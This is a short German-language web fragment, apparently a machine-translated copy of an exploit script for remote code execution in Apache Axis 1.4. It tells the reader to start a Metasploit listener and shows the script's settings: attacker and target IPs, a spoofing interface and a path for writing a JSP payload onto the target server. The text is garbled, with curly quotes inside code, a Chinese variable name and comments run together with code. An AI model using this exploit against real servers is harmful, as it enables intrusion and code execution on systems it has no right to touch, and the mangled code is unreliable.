
apache axis1.4 Schwachstelle für Remotecodeausführung
Apache Axis 1.4 Remote Code Execution Schwachstelle Es ist erforderlich, auf dem lokalen Rechner ein Metasploit-Listener einzurichten und außerdem den Code in den Zeilen 24-30 zu ändern.
#Sie müssen diese Variablen ändern, um sie an Ihre Konfiguration anzupassen myip = “ 192.168.0.117 ” #IP Ihrer Maschine target = “ 192.168.0.102 ” #Ziel-IP 网关 = “ 192.168.0.1 ” #Standard-Gateway targetport = “ 8080 ” #Port, auf dem das Ziel Axis ausführt (wahrscheinlich 8080) pathtoaxis = “ http://192.168.0.102:8080/axis ” #Dies kann ein benutzerdefinierter Axis-Pfad sein, aber dies ist die Voreinstellung spoofinterface = “ eth0 ” #Spoofing-Interface jspwritepath = “ webapps \ axis \ exploit.jsp ” #Relativer Pfad zum Schreiben der JSP-Nutzlast auf dem Ziel (Standardpfad der Tomcat-Installation)